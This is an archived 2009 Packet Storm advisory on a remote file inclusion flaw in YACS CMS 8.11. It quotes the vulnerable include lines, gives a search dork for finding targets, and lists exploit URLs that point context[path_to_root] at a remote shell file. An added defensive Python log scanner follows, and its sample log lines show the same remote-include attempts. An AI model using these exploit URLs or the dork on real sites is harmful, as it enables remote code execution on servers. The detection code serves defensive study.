YACS CMS 8.11 Remote File Inclusion

2009-02-16T00:00:00
ID PACKETSTORM:74990
Type packetstorm
Reporter ahmadbady
Modified 2009-02-16T00:00:00

Description

                                        
` -----------------[remote file include]-----------------
  
script: YACS version 8.11  
  
------------------------------------------------------------------  
  
download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip  
  
  
==============================================  
vul: /yacs/scripts/update_trailer.php, lines 21, 23 and 25:

include_once $context['path_to_root'].'shared/safe.php'; // line 21
if(!class_exists('i18n'))
    include_once $context['path_to_root'].'i18n/i18n.php'; // line 23
if(!class_exists('SQL'))
    include_once $context['path_to_root'].'shared/sql.php'; // line 25
  
  
  
==============================================  
  
dork: "Powered by yacs"  
----------------------------------------------  
  
xpl:  
  
http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]  
  
http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]  
  
***************************************************  
***************************************************  
---------------------------------------------------  
Author: ahmadbady [kivi_hacker666@yahoo.com]  
  
from[iran]  
---------------------------------------------------  
  
  
`
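A defender's view of the request pattern shown under "xpl", as an added example that is not part of the original advisory: a Python check that scans web-server access logs for requests that supply `context[path_to_root]` to a script. The log lines, IP addresses and the host `files.example` are constructed for illustration, and the common/combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request portion of a common/combined access-log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# A value that starts with scheme:// points the include at a remote resource.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)
PARAM = "context[path_to_root]"  # parameter named in the advisory

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Feb/2009:10:00:01 +0000] "GET /yacs/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Feb/2009:10:00:05 +0000] "GET /yacs/scripts/update_trailer.php'
    '?context[path_to_root]=http://files.example/s.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [16/Feb/2009:10:00:09 +0000] "GET /yacs/scripts/update_trailer.php'
    '?context%5Bpath_to_root%5D=http%3A%2F%2Ffiles.example%2Fs.txt%3F HTTP/1.0" 200 312',
    '203.0.113.4 - - [16/Feb/2009:10:01:00 +0000] "GET /yacs/scripts/update_trailer.php'
    '?context[path_to_root]=/srv/www/yacs/ HTTP/1.1" 200 88',
]

def find_path_to_root_overrides(lines):
    """Return (ip, path, value, severity) for requests that set context[path_to_root].

    No legitimate client needs to send this parameter, so every hit is worth
    reviewing; a scheme:// value is graded as a remote include attempt.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable request line
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes keys, so context%5Bpath_to_root%5D matches too.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key.strip() == PARAM:
                severity = "remote-include" if REMOTE_RE.match(value) else "override"
                hits.append((m.group("ip"), target.path, value, severity))
    return hits

if __name__ == "__main__":
    for hit in find_path_to_root_overrides(SAMPLE_LOG):
        print(hit)
```
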